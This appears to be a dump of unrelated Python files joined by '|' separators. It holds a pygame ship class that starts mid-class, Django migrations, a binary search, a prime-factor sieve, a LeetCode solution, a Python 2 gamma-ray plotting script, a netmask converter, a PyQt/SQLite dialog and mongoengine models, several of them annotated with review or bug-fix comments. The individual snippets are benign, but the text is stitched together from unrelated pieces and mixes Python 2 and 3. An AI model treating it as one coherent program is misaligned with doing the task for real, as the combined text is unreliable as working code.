    """The player's ship: movement, shooting, HP with 1-second invincibility
    frames, and per-frame drawing (pygame)."""

    def __init__(self, screen, position=PLAYER_POSITION, size=PLAYER_SIZE, speed=PLAYER_SPEED, fire_cadence=PLAYER_FIRE_CADENCE, image_file=PLAYER_IMAGE):
        super().__init__(position, size, image_file)
        self.screen = screen
        self.speed = speed
        self.bullets = []  # live Bullet instances fired by this player
        self.powerups = []
        self.bullet_lines = PLAYER_BULLET_LINES  # number of parallel shot lines (indexes layouts below)
        self.fire_cadence = fire_cadence  # minimum ms between shots
        self.last_shot = pygame.time.get_ticks()
        self.hp = PLAYER_HP
        self.last_damage = pygame.time.get_ticks()
        # sic "invencible": set after taking damage; drives the damaged sprite
        # in update() for 1 second.
        self.invencible = False

    def move(self, keys):
        """Move within screen bounds based on WASD / arrow keys; the ship may
        overlap the edge by up to half its size."""
        if (keys[pygame.K_w] or keys[pygame.K_UP]) and self.rect.top > -self.height / 2:
            self.rect.top -= self.speed
        if (keys[pygame.K_s] or keys[pygame.K_DOWN]) and self.rect.top < self.screen.get_height() - self.height / 2:
            self.rect.top += self.speed
        if (keys[pygame.K_a] or keys[pygame.K_LEFT]) and self.rect.left > -self.width / 2:
            self.rect.left -= self.speed
        if (keys[pygame.K_d] or keys[pygame.K_RIGHT]) and self.rect.left < self.screen.get_width() - self.width / 2:
            self.rect.left += self.speed

    def shoot(self):
        """Spawn one bullet per configured line, throttled by fire_cadence."""
        now = pygame.time.get_ticks()
        if now - self.last_shot > self.fire_cadence:
            self.last_shot = now
            # x-position layouts per line count; [bullet_lines - 1] selects one.
            bullet_x_pos = [
                [self.rect.left + self.width / 2],
                [self.rect.left + 20, self.rect.left + self.width - 20],
                [self.rect.left + 5, self.rect.left + self.width / 2, self.rect.left + self.width - 5]
            ]
            bullet_y_pos = self.rect.top + self.height / 2
            for i in range(self.bullet_lines):
                if self.bullet_lines == 3:
                    # NOTE(review): offsets accumulate across iterations
                    # (+30, then -30, then +30), staggering the three shots
                    # vertically -- confirm this pattern is intended.
                    if i == 1:
                        bullet_y_pos -= 30
                    else:
                        bullet_y_pos += 30
                b = Bullet(
                    [bullet_x_pos[self.bullet_lines - 1][i], bullet_y_pos],
                    PLAYER_BULLET_SIZE,
                    PLAYER_BULLET_SPEED,
                    Player
                )
                self.bullets.append(b)

    def handle_hp(self, quantity=-1) -> int:
        """Apply an HP change; damage (negative) respects a 1 s cooldown.

        :param quantity: HP delta; negative values are damage
        :return: the player's HP after the change
        """
        now = pygame.time.get_ticks()
        if quantity < 0:
            # Damage only lands if the cooldown elapsed or HP is still full.
            if now - self.last_damage > 1000 or self.hp == PLAYER_HP:
                self.last_damage = now
                self.hp += quantity
                self.invencible = True
        else:
            # Healing/pickups apply unconditionally.
            self.hp += quantity
        return self.hp

    def update(self):
        """Draw the ship, swapping in the damaged sprite during i-frames."""
        now = pygame.time.get_ticks()
        image = self.image
        rect = self.rect
        if self.invencible and now - self.last_damage < 1000:
            # Reloads the damaged sprite from disk every frame while active.
            image = pygame.image.load('assets/spaceshipdamaged.png')
            image = pygame.transform.scale(image, self.size)
            # NOTE(review): this local rect is never used below -- the blit
            # uses self.rect; confirm whether repositioning was intended.
            rect = image.get_rect()
        self.screen.blit(image, (self.rect.left, self.rect.top))
# Generated by Django 3.1.1 on 2020-11-27 09:57
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: make blog.Post.event a unique CharField(100)."""

    dependencies = [
        ('blog', '0012_post_etime'),
    ]

    operations = [
        migrations.AlterField(
            model_name='post',
            name='event',
            field=models.CharField(max_length=100, unique=True),
        ),
    ]
|
# Binary search
#http://rosalind.info/problems/bins/
# Sample problem values (overwritten by the file parse just below).
n = 5
m = 6
A = [10, 20, 30, 40, 50]
K = [40, 10, 35, 15, 40, 20]
# Parsing from file:
# NOTE(review): assumes exactly four newline-separated fields; n and m stay
# strings after this but are never used numerically afterwards.
with open('rosalind_bins.txt', 'r') as contents:
    n, m, A, K = contents.read().strip().split('\n')
A = [int(a) for a in A.split(' ')]
K = [int(k) for k in K.split(' ')]
def binarySearch(arr, key, start, finish):
    """Recursive binary search over the half-open range arr[start:finish].

    :param arr: sorted list to search
    :param key: value to find
    :param start: inclusive lower bound of the search interval
    :param finish: exclusive upper bound of the search interval
    :return: an index i with arr[i] == key, or -1 if key is absent
    """
    # Empty interval: can't find it.
    if start >= finish:
        return -1
    # // keeps the midpoint an int; the original's `/ 2` produced a float
    # index under Python 3 and crashed on arr[mid].
    mid = (start + finish) // 2
    # found it
    if arr[mid] == key:
        return mid
    # keep looking in the half that can contain the key
    if arr[mid] > key:
        return binarySearch(arr, key, start, mid)
    # Exclude mid here: the original kept mid in the interval and bailed out
    # whenever mid == start, so a key at index 0 (e.g. the smallest element)
    # was never found.
    return binarySearch(arr, key, mid + 1, finish)
def getSearchIndices(arr, keys):
    """Search each key in arr and return 1-based hit indices (-1 if absent)."""
    size = len(arr)
    raw_hits = [binarySearch(arr, key, 0, size) for key in keys]
    # Convert 0-based hits to 1-based; misses stay -1.
    return map(lambda idx: idx + 1 if idx >= 0 else -1, raw_hits)
indices = getSearchIndices(A, K)
#print indices
# Write the 1-based hit indices space-separated to the output file.
with open('bins_output.txt', 'w') as dump:
    dump.write(' '.join([str(i) for i in indices]))
|
#!/usr/bin/env python3
from ObliviousTransfer import One_out_of_Two

# Alice plays the sender (server) role in a 1-out-of-2 oblivious transfer:
# she stores two secrets, lists them, then starts the protocol.
alice = One_out_of_Two(client=False)
alice.verbose = True
alice.store_secret("A", "Some description")
alice.store_secret("B", "Another description")
alice.show_secrets()
alice.start()
# -*- coding: utf-8 -*-
"""
The :mod:`.utility` module has several functions that support celloracle.
"""
from .make_log import makelog
from .utility import (save_as_pickled_object, load_pickled_object,
intersect,
exec_process,
standard, inverse_dictionary,
adata_to_color_dict,
transfer_all_colors_between_anndata,
transfer_color_between_anndata,
knn_data_transferer,
update_adata)
from .load_hdf5 import load_hdf5
from .pandas_utility_for_jupyternotebook import init_datatable_mode
from .package_version_checker import check_python_requirements
# Public API of the utility module.
__all__ = [
    "makelog",
    "save_as_pickled_object",
    "load_pickled_object",
    "intersect",
    "exec_process",
    "standard",
    "load_hdf5",
    # Bug fix: the missing comma after "inverse_dictionary" made Python
    # concatenate it with "adata_to_color_dict" into one bogus export name,
    # so neither symbol was exported by `from ... import *`.
    "inverse_dictionary",
    "adata_to_color_dict",
    "transfer_all_colors_between_anndata",
    "transfer_color_between_anndata",
    "knn_data_transferer",
    "update_adata",
]
|
import waveletsim_53 as dwt
im = dwt.Image.open("../lena_512.png")
pix = im.load()
m = list(im.getdata())
#print m.__sizeof__()
m = [m[i:i+im.size[0]] for i in range(0, len(m), im.size[0])]
#m_orig = copy.deepcopy(m)
#m_orig[0][0]=300
#print m_orig[0][0], m[0][0]
#print len(m_orig[0]), len(m_orig[1])
#print m.__sizeof__()
#print len(m[0]), len(m[1])
"""Converts the 16bit to list m[row][col] this is the procedure that will be needed in the FPGA"""
#convert_intelhex_to_list()
#print m[0][0].__sizeof__()
m = dwt.fwt97_2d(m, 1)
# Convert the list of lists matrix to an image.
dwt.seq_to_img(m, pix)
#convert_list_to_bin()
# Save the transformed image.
im.save("test1_512_fwt.png")
w, h = im.size
m = dwt.upper_lower(m, w, h)
#mm = copy.deepcopy(m)
m = dwt.iwt97_2d(m, 1)
dwt.seq_to_img(m, pix)
#mm_1lvl = copy.deepcopy(mm)
im.save("test1_512_iwt.png")
'''
for i in range(512):
for j in range(512):
diff = m_orig[j][i] - mm_1lvl[j][i]
if (diff != 0):
print "i", i,"j",j,"diff", diff,"orig", m_orig[j][i] , "fwd/inv",mm_1lvl[j][i]
'''
|
#prime factorization using seive()
#find smallest prime factor(spf) for everynumber using seive()
#and recursively divide the number with this SPF and add to prime list
import math
def smallest_prime_factor(limit):
    """Sieve the smallest prime factor (SPF) for every number up to limit.

    :param limit: inclusive upper bound of the table
    :return: list spf where spf[i] is the smallest prime factor of i
             (spf[0] == 0, spf[1] == 1 by convention)
    """
    spf = [0] * (limit + 1)
    spf[1] = 1
    # Seed: evens have SPF 2; odds start as their own SPF.
    for value in range(2, limit + 1):
        spf[value] = 2 if value % 2 == 0 else value
    # Sieve odd primes: the first time an odd p is still its own SPF it is
    # prime, so mark its multiples from p*p upwards.
    for p in range(3, math.ceil(math.sqrt(limit + 1)), 2):
        if spf[p] == p:
            for multiple in range(p * p, limit + 1, p):
                if spf[multiple] > p:
                    spf[multiple] = p
    return spf
def prime_factors_of_number(n):
    """Return the prime factorization of n (with multiplicity, ascending),
    by repeatedly dividing out the sieve's smallest prime factor."""
    sieve = smallest_prime_factor(n)
    factors = []
    while n != 1:
        smallest = sieve[n]
        factors.append(smallest)
        n //= smallest
    return factors
# Demo: expected factors of 12246 are 2, 3, 13, 157.
print(prime_factors_of_number(12246))
#2 3 13 157
|
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
    def subtreeWithAllDeepest(self, root):
        """
        Return the smallest subtree containing all of the tree's deepest nodes.

        :type root: TreeNode
        :rtype: TreeNode
        """
        if root is None:  # idiom fix: `is None` instead of `== None`
            return None
        # BFS level by level; when the queue empties, `deepest` holds the
        # nodes of the last (deepest) level.
        queue = [root]
        deepest = set()
        while len(queue) > 0:
            deepest = set(queue.copy())
            for _ in range(len(queue)):
                node = queue.pop(0)
                if node.left:
                    queue.append(node.left)
                if node.right:
                    queue.append(node.right)
        # (Removed an unused `count = [0]` local from the original.)

        def traverse(node):
            # Post-order walk. Returns the answer TreeNode once found
            # (propagated unchanged), otherwise the list of nodes in this
            # subtree so the parent can test coverage of `deepest`.
            if not node:
                return []
            lr = traverse(node.left)
            rr = traverse(node.right)
            if isinstance(lr, TreeNode):
                return lr
            if isinstance(rr, TreeNode):
                return rr
            this_layer = [node] + lr + rr
            # The first (lowest) node whose subtree covers every deepest
            # node is the answer.
            if deepest.issubset(this_layer):
                return node
            return this_layer

        return traverse(root)
# a = TreeNode(1)
# b = TreeNode(2)
# c = TreeNode(3)
# d = TreeNode(4)
# e = TreeNode(5)
# f = TreeNode(6)
# a.left = b
# a.right = c
# b.left = d
# b.right = e
# c.right = f
# print(Solution().subtreeWithAllDeepest(a).val) |
from samson_const import *
from pathloc import *
import matplotlib as mpl
mpl.use('Agg')
from readsnap_cr import readsnapcr
import Sasha_functions as SF
import graphics_library as GL
import gas_temperature as GT
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.colors import LogNorm
from samson_functions import *
from crtestfunction import *
from matplotlib import rcParams
from pylab import *
from textwrap import wrap
from scipy.optimize import curve_fit
#rcParams['figure.figsize'] = 5, 5
# Global matplotlib styling: serif/TeX fonts, thick axes, embedded fonts in
# PDF/PS output (fonttype 42 keeps text editable).
rcParams['figure.figsize'] = 10, 5
rcParams['font.size']=12
rcParams['font.family']='serif'
rcParams['text.usetex']=True
#rcParams.update({'figure.autolayout': True})
import matplotlib.patches as patches
rcParams['axes.linewidth'] = 2
rcParams['pdf.fonttype'] = 42
rcParams['ps.fonttype'] = 42
rcParams['ps.useafm'] = True
rcParams['pdf.use14corefonts'] = True
rcParams['axes.unicode_minus']=False
colortable = [ 'b', 'g', 'r']
# Simulation runs to plot: SMC-, MW- and SBC-like galaxies with various
# cosmic-ray diffusion / streaming / MHD setups.
dirneed=['bwsmclrdc0','bwsmclrdc27','bwsmclrdc28','bwsmclrdc29','bwsmclrstr','bwsmclrdc28mhd','bwsmclrdc28str',
         'bwmwmrdc0','bwmwmrdc27','bwmwmrdc28', 'bwmwmrdc29','bwmwmrstr','bwmwmrdc28mhd','bwmwmrdc28str',
         'bwsbclrdc0','bwsbclrdc27', 'bwsbclrdc28','bwsbclrdc29','bwsbclrstr','bwsbclrdc28mhd','bwsbclrdc28str']
# Tag used in the output filename (taken from the last run name).
fmeat=dirneed[-1]
startno=400   # first snapshot number
Nsnap=501     # last snapshot number
snapsep=10    # snapshot stride
wanted='SFRLg'  # which figure to produce (only 'SFRLg' handled below)
title='MW'
ptitle='LSG'
nolegend=0
convertfromChabtoKrou=1 #conversion according to Crain 2010 and Hayward 2014
# Python 2 script (print statements).
print 'wanted', wanted
print 'fmeat', fmeat
print 'runtodo', dirneed
if wanted=='SFRLg':
    # SFR vs gamma-ray luminosity figure: one median point (with 1-sigma
    # bars) per simulation run, plus observed galaxies and the calorimetric
    # line. Indentation reconstructed from a whitespace-mangled source.
    import time
    rcParams['figure.figsize'] = 6,6
    varR = 0
    sepave=0
    useFcal=1       # use the calibrated gamma-ray luminosity estimate
    atstarburst=1   # restrict SBC runs to snapshots around the starburst
    sbgassurmin=0.08
    newlabelneed=1
    if varR==1:
        radgas=0.0
    else:
        radgas=1.0 #kpc
    Rfrac=0.03
    for runtodo in dirneed:
        gassurl=[]
        gassurxl=[]
        gassuryl=[]
        gassurzl=[]
        info=outdirname(runtodo, Nsnap)
        havecr=info['havecr']
        dclabel=info['dclabel']
        runtitle=info['runtitle']
        print 'havecr', havecr
        print 'runtitle', runtitle
        haveB=info['haveB']
        cosmo=info['cosmo']
        color=info['color']
        correctIa=info['correctIa']
        # Only runs with cosmic rays are plotted.
        if havecr==0:
            continue
        runtitle=info['runtitle']
        newlabel=info['newlabel']
        starburst=0
        shiftz=0
        mks=10
        pstartno = startno
        pNsnap = Nsnap
        psnapsep = snapsep
        crshiftz=1
        marker='^'
        # Per-galaxy-class aperture, marker and snapshot windows.
        if runtitle=='SMC':
            physicalR=3.0
            shiftz=1
            marker='o'
            radgas=2.0
        elif runtitle=='MW':
            physicalR=10.0
            shiftz=1
            marker='^'
            mks=14
            radgas=4.0
        elif runtitle=='SBC':
            physicalR=10.0
            starburst=1
            pstartno=300
            pNsnap=600
            psnapsep=5
            radgas=0.25
            if atstarburst==1:
                # Narrow, run-specific snapshot windows around each burst.
                psnapsep=1
                if runtodo=='bwsbclr':
                    pNsnap=528
                    pstartno=518
                if runtodo=='bwsbclrdc0':
                    pNsnap=594
                    pstartno=584
                if runtodo=='bwsbclrdc27':
                    pNsnap=143
                    pstartno=133
                if runtodo=='bwsbclrdc28':
                    pNsnap=525
                    pstartno=515
                if runtodo=='bwsbclrdc29':
                    pNsnap=438
                    pstartno=428
                if runtodo=='bwsbclrstr':
                    pNsnap=250
                    pstartno=240
                if runtodo=='bwsbclrdc28mhd':
                    pNsnap=563
                    pstartno=553
                if runtodo=='bwsbclrdc28str':
                    pNsnap=375
                    pstartno=365
            shiftz=1
            marker='D'
        if cosmo == 1:
            physicalR=6.0
            if runtodo=='m10qcr_b_70':
                physicalR=3.0
        outdata = dirout(runtodo,pstartno,pNsnap,psnapsep, Rfrac,physicalR=physicalR,shiftz=crshiftz)
        avesfrl = outdata['avesfrl']
        Lsfr = outdata['Lsfr']
        # Pick the gamma-ray luminosity estimate depending on CR physics.
        if havecr>4:
            Lgamma_sfr=outdata['Lgamma_sfr']
            Lgamma = outdata['Lgamma']
        elif havecr>0:
            Lgamma_sfr=outdata['Lgcal_sfr']
            Lgamma = outdata['Lgcal']
        # NOTE(review): placement reconstructed -- this override applies to
        # all runs when useFcal is set.
        if useFcal==1:
            Lgamma_sfr=outdata['Lgcal_sfr']
            Lgamma = outdata['Lgcal']
        if correctIa==1 and havecr>0:
            Lgamma_sfr=outdata['Lgamma_sfr_noIa']
        print 'Lgamma_sfr', Lgamma_sfr
        Lgamma_sfr = Lgamma_sfr[np.isfinite(Lgamma_sfr)]
        #if starburst==1:
        #    sfrcut=avesfrl>6.0
        #    Lgamma_sfr=Lgamma_sfr[sfrcut]
        print 'Lgamma_sfr', Lgamma_sfr
        if len(Lgamma_sfr)==0:
            continue
        labelneed=dclabel
        if newlabelneed==1:
            labelneed="\n".join(wrap(newlabel,17))
        print 'labelneed', labelneed
        # Open markers for MHD runs, filled otherwise.
        if haveB>0:
            #if runtodo=='bwmwmrdc28mhd' or runtodo=='bwsmclrdc28mhd' or runtodo=='bwsbclrdc28mhd':
            fillstyle='none'
        else:
            fillstyle='full'
        # Only MW/COSMO runs contribute legend entries.
        if not ( runtitle=='MW' or runtitle=='COSMO'):
            labelneed=''
        if starburst==1:
            # Keep only snapshots with SFR above 3 Msun/yr for starbursts.
            avesfrold = avesfrl
            sfrcut=avesfrold>3.0
            avesfrl = avesfrl[sfrcut]
            # NOTE(review): Lgamma is trimmed by one before masking --
            # presumably to align array lengths; confirm against dirout().
            Lgamma=Lgamma[:-1]
            Lgamma = Lgamma[sfrcut]
        # Median and ~1-sigma spread (15.8th / 84th percentiles).
        SFRmed = np.median(avesfrl)
        SFR1sigu = np.percentile(avesfrl,84)-SFRmed
        SFR1sigd = SFRmed-np.percentile(avesfrl,15.8)
        Lmed = np.median(Lgamma)
        L1sigu = np.percentile(Lgamma,84)-Lmed
        L1sigd = Lmed-np.percentile(Lgamma,15.8)
        print 'SFRmed, Lmed', SFRmed, Lmed
        plt.errorbar(SFRmed, Lmed, xerr=[[SFR1sigd],[SFR1sigu]], yerr=[[L1sigd],[L1sigu]]\
            ,color=color,fmt=marker,markersize=7,label=labelneed, fillstyle=fillstyle)
    # Older observational values kept for reference:
    # obsdatal = [[0.2,0.2,0.2,1.7e37,1.3e37,2.1e37]\
    #LMC
    # ,[0.068,0.036,0.1,4.3e36,4.3e36,4.3e36]\
    #SMC
    # ,[2.0,1.2,3.4,6.5e38,6.5e38,6.5e38]\
    #MW
    # ,[1.0,1.0,1.0,1.9e38,1.5e38,2.3e38]\
    #M31
    # ,[6.18,6.18,6.18,2e40,1.6e40,2.4e40]\
    #M82
    # ,[2.82,2.82,2.82,9.5e39,6.0e39,14.0e39]\
    #NGC253
    # ,[3.49,3.49,3.49,1.7e40,1.2e40,2.2e40]\
    #NGC4945
    # ,[37,37,37,8e40,6e40,10e40]]
    #NGC1068
    # Observed galaxies: [SFR, SFR_low, SFR_high, Lgamma, Lg_low, Lg_high].
    obsdatal = [[0.2,0.2,0.2,1.7e37,1.3e37,2.1e37]
    #LMC
    ,[0.068,0.036,0.1,4.3e36,4.3e36,4.3e36]
    #SMC
    ,[2.0,1.2,3.4,6.5e38,6.5e38,6.5e38]
    #MW
    ,[1.0,1.0,1.0,1.9e38,1.5e38,2.3e38]
    #M31
    ,[7.83,7.83,7.83,2e40,1.6e40,2.4e40]
    #M82
    ,[4.66,4.66,4.66,9.5e39,6.0e39,14.0e39]
    #NGC253
    ,[4.00,4.00,4.00,1.7e40,1.2e40,2.2e40]
    #NGC4945
    ,[24.74,24.74,24.74,8e40,6e40,10e40]]
    #NGC1068
    # Gamma-ray non-detections from a local data file (log10 values).
    ftxt = open(programdir+'/data/nondetectGammaray.txt', 'r')
    ftxt.readline()
    dars = ftxt.readlines()
    ftxt.close()
    SFRlnd=[]
    LGRl=[]
    for line in dars:
        xsd = line.split()
        if convertfromChabtoKrou==1: #conversion according to Crain 2010 and Hayward 2014
            SFRlnd =np.append(SFRlnd, float(xsd[0])/0.79/1.5)
            LGRl=np.append(LGRl, float(xsd[1]))
    #plt.plot(np.power(10.,SFRlnd),np.power(10.,LGRl),markersize=4,mfc='None'\
    #    ,markeredgecolor='red', marker='s',ls='None')
    # Plot each observed galaxy with asymmetric error bars.
    for data in obsdatal:
        plt.errorbar(data[0], data[3],\
            xerr=[[data[0]-data[1]],[data[2]-data[0]]],\
            yerr=[[data[3]-data[4]],[data[5]-data[3]]],\
            fmt='s', color='0.5',ls='dashed', mfc='0.9',markersize=6)
    # ndpoint = plt.errorbar([],[], fmt='s', color='red', mfc='None',markersize=6)
    # Empty proxy artists for the custom first legend.
    obsbar = plt.errorbar([],[], fmt='s', color='0.5', mfc='0.9',markersize=6)
    dwarfpoint = plt.errorbar([],[], fmt='o', color='g', mfc='g',markersize=6)
    lstarpoint = plt.errorbar([],[], fmt='^', color='g', mfc='g',markersize=6)
    sbpoint = plt.errorbar([],[], fmt='D', color='g', mfc='g',markersize=6)
    import matplotlib.lines as mlines
    calline = mlines.Line2D([], [], color='k', ls='dashed')
    lxlist = [obsbar,dwarfpoint,lstarpoint,sbpoint,calline]
    # dclablist = ['Non detection','Observations','Dwarf',r'L$\star$ Galaxy', 'Starburst']
    dclablist = ['Observations','Dwarf',r'L$\star$ Galaxy', 'Starburst','Calorimetric']
    legend1 = plt.legend(lxlist, dclablist, loc=2,fontsize=10,ncol=3)
    plt.gca().add_artist(legend1)
    #calorimetric line:
    sfrref = np.power(10,np.linspace(-3,1.7))
    Lgcal = sfrref*6e39
    plt.plot(sfrref,Lgcal,color='k',ls='dashed')
    plt.yscale('log')
    plt.xscale('log')
    plt.xlabel(r'${\rm SFR}\;{\rm [M_\odot/yr]}$', fontsize=20)
    plt.ylabel(r'$L_{\gamma}$', fontsize=20)
    plt.legend(loc=4,fontsize=10,ncol=2, numpoints=1)
    figname=plotloc+'CRplot/SFRLg/SFRLg_'+fmeat+'_sn'+str(startno)+'_'+str(Nsnap)+'.pdf'
    print 'figname', figname
    plt.tick_params(axis='both', which='both',direction='in',bottom=True,top=True,left=True,right=True,labelsize=18)
    plt.savefig(figname,bbox_inches='tight')
    plt.clf()
# Generated by Django 3.0 on 2019-12-07 17:46
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the quote app: a per-user Schedule and its Steps."""

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Schedule',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('saleprice', models.PositiveIntegerField(default=100000)),
                ('rv', models.PositiveIntegerField()),
                # One schedule per user (OneToOne); deleted with the user.
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Step',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('rank', models.PositiveSmallIntegerField(default=1)),
                ('amount', models.PositiveIntegerField(default=0)),
                ('number', models.PositiveSmallIntegerField(default=24)),
                # Periodicity values encode months-per-period (0 treated as monthly).
                ('periodicity', models.PositiveSmallIntegerField(choices=[(0, 'Months'), (3, 'Quarters'), (12, 'Years')], default=0)),
                ('mode', models.PositiveSmallIntegerField(choices=[(0, 'Find'), (1, 'Fixed')], default=0)),
                # Steps are reachable from a schedule via schedule.has_steps.
                ('schedule', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='has_steps', to='quote.Schedule')),
            ],
        ),
    ]
|
#7. Write program to convert prefix/net mask to IP
def prefix_to_mask(prefix):
    """Return the dotted-quad netmask string for a CIDR prefix length.

    prefix: number of leading 1-bits in the 32-bit mask (0-32).
    Example: 16 -> '255.255.0.0'.
    """
    # Build the mask arithmetically instead of assembling per-bit lists:
    # `prefix` one-bits followed by (32 - prefix) zero-bits.
    if prefix <= 0:
        mask = 0
    else:
        mask = (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF
    octets = [(mask >> shift) & 0xFF for shift in (24, 16, 8, 0)]
    return '.'.join(str(octet) for octet in octets)


subnet = 16
# Fixed typo ("Net mak" -> "Net mask") and switched to print() so the
# script runs under both Python 2 and Python 3; output is otherwise identical.
print(' The IP for Net mask = %d is --> %s' % (subnet, prefix_to_mask(subnet)))
|
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------
# Nombre: recuperarImagen.py
# Autor: Miguel Andres Garcia Niño
# Creado: 07 de Mayo 2018
# Modificado: 07 de Mayo 2018
# Copyright: (c) 2018 by Miguel Andres Garcia Niño, 2018
# License: Apache License 2.0
# ----------------------------------------------------------------------------
__versión__ = "1.0"
"""
El módulo *recuperarImagen* permite mostrar una foto en un QLabel y un nombre de usuario
en un QLineEdit que están almacenados en una Base de Datos (SQLite).
"""
from os import getcwd
from sqlite3 import connect
from PyQt5.QtGui import QIcon, QPixmap
from PyQt5.QtCore import Qt, pyqtSignal, QByteArray, QIODevice, QBuffer
from PyQt5.QtWidgets import (QApplication, QDialog, QLabel, QPushButton, QFileDialog,
QLabel, QLineEdit)
# ===================== CLASE QLabelClickable ======================
class QLabelClickable(QLabel):
    """QLabel subclass that emits a ``clicked`` signal on any mouse press."""

    clicked = pyqtSignal()

    def __init__(self, parent=None):
        """Create the label; *parent* is forwarded unchanged to QLabel."""
        super().__init__(parent)

    def mousePressEvent(self, ev):
        """Translate a mouse-press on the label into the ``clicked`` signal."""
        self.clicked.emit()
# ==================== CLASE recuperarImagen =======================
class recuperarImagen(QDialog):
    """Dialog that shows a user photo (QLabel) and name (QLineEdit) backed
    by a SQLite database (DB_USUARIOS.db)."""

    def __init__(self, parent=None):
        super(recuperarImagen, self).__init__(parent)

        self.setWindowTitle("Recuperar imagen por: ANDRES NIÑO")
        self.setWindowIcon(QIcon("icono.png"))
        # Fixed-size, close-button-only dialog.
        self.setWindowFlags(Qt.WindowCloseButtonHint | Qt.MSWindowsFixedSizeDialogHint)
        self.setFixedSize(400, 511)

        self.initUI()

    def initUI(self):
        """Build and position all widgets and wire up their events."""
        # ==================== QLABEL WIDGET =======================
        # Clickable label that displays the selected/retrieved image.
        self.labelImagen = QLabelClickable(self)
        self.labelImagen.setGeometry(15, 15, 168, 180)
        self.labelImagen.setToolTip("Imagen")
        self.labelImagen.setCursor(Qt.PointingHandCursor)
        self.labelImagen.setStyleSheet("QLabel {background-color: white; border: 1px solid "
                                       "#01DFD7; border-radius: 2px;}")
        self.labelImagen.setAlignment(Qt.AlignCenter)

        # ==================== QLABEL WIDGETS ======================
        labelNombre = QLabel("Nombre de usuario", self)
        labelNombre.move(193, 15)

        # ================== QLINEEDIT WIDGETS =====================
        # Field holding the user name used as the lookup key.
        self.lineEditNombre = QLineEdit(self)
        self.lineEditNombre.setGeometry(193, 30, 192, 25)

        # ================= QPUSHBUTTON WIDGETS ====================
        buttonSeleccionar = QPushButton("Seleccionar", self)
        buttonSeleccionar.setToolTip("Seleccionar imagen")
        buttonSeleccionar.setCursor(Qt.PointingHandCursor)
        buttonSeleccionar.setGeometry(15, 200, 168, 25)

        buttonBuscar = QPushButton("Buscar", self)
        buttonBuscar.setToolTip("Buscar usuario")
        buttonBuscar.setCursor(Qt.PointingHandCursor)
        buttonBuscar.setGeometry(193, 60, 93, 25)

        buttonGuardar = QPushButton("Guardar", self)
        buttonGuardar.setToolTip("Guardar usuario")
        buttonGuardar.setCursor(Qt.PointingHandCursor)
        buttonGuardar.setGeometry(292, 60, 93, 25)

        # ===================== QLABEL EVENT =======================
        # Clicking the image label also opens the file picker.
        self.labelImagen.clicked.connect(self.seleccionarImagen)

        # ================== QPUSHBUTTON EVENTS ===================
        buttonSeleccionar.clicked.connect(self.seleccionarImagen)
        buttonBuscar.clicked.connect(self.Buscar)
        buttonGuardar.clicked.connect(self.Guardar)

    # ======================= FUNCTIONS ============================
    def seleccionarImagen(self):
        """Open a file dialog and show the chosen image in the label."""
        imagen, extension = QFileDialog.getOpenFileName(self, "Seleccionar imagen", getcwd(),
                                                        "Archivos de imagen (*.png *.jpg)",
                                                        options=QFileDialog.Options())

        if imagen:
            # Scale the image to fit the label while keeping aspect ratio.
            pixmapImagen = QPixmap(imagen).scaled(166, 178, Qt.KeepAspectRatio,
                                                  Qt.SmoothTransformation)

            # Display the image.
            self.labelImagen.setPixmap(pixmapImagen)

    def Buscar(self):
        """Look up the typed user name in SQLite and display its stored photo."""
        # Normalize the typed user name (collapse whitespace, Title Case).
        nombre = " ".join(self.lineEditNombre.text().split()).title()

        if nombre:
            # Connect to the database.
            conexion = connect("DB_USUARIOS.db")
            cursor = conexion.cursor()

            # Search for the user in the database.
            cursor.execute("SELECT * FROM Usuarios WHERE NOMBRE = ?", (nombre,))
            resultado = cursor.fetchone()

            # Check whether a row was found.
            if resultado:
                # Load the stored photo blob into a QPixmap.
                # NOTE(review): assumes column 1 holds PNG image bytes and
                # column 0 the stored name — confirm against the writer side.
                foto = QPixmap()
                foto.loadFromData(resultado[1], "PNG", Qt.AutoColor)

                # Show the photo in the QLabel.
                self.labelImagen.setPixmap(foto)

                # Put the stored user name back into the QLineEdit.
                self.lineEditNombre.setText(resultado[0])
            else:
                self.labelImagen.clear()
                print("El usuario {} no existe.".format(nombre))

            # Close the database connection.
            conexion.close()
            self.lineEditNombre.setFocus()
        else:
            self.lineEditNombre.clear()
            self.lineEditNombre.setFocus()

    def Guardar(self):
        # Not implemented yet (placeholder for saving name + photo).
        pass
# ================================================================
if __name__ == '__main__':
    # Launch the dialog as a standalone application.
    import sys

    app = QApplication(sys.argv)
    dialog = recuperarImagen()
    dialog.show()
    sys.exit(app.exec_())
|
from mongoengine import Document, fields
# Create your models here.
class Certification(Document):
    """Certification request document (MongoDB collection ``Certification``)."""
    # Fixed typo: the mongoengine field option is ``required``, not ``require``;
    # the misspelled kwarg is not a valid option (matching the intent shown by
    # the correctly-spelled fields below).
    _id = fields.ObjectIdField(required=True)
    user_id = fields.ObjectIdField(required=True)
    org = fields.StringField(required=True)
    name = fields.StringField(required=True)
    tags = fields.ListField(required=True)
    apply_time = fields.LongField(required=True)
    deal_time = fields.LongField(required=True)
    state = fields.StringField(required=True)  # approval state
    _class = fields.StringField()
    meta = {'collection' : 'Certification'}
class users(Document):
    """User account document (MongoDB collection ``users``)."""
    # Fixed typo: ``require`` -> ``required`` (the valid mongoengine option,
    # consistent with every other field in this class).
    _id = fields.ObjectIdField(required=True)
    email = fields.StringField(required=True)
    userName = fields.StringField(required=True)
    password = fields.StringField(required=True)
    photo = fields.StringField(required=True)
    point = fields.StringField(required=True)
    type = fields.StringField(required=True)
    favourites = fields.ListField(required=True)
    _class = fields.StringField()
    meta = {'collection' : 'users'}
|
import numpy as np
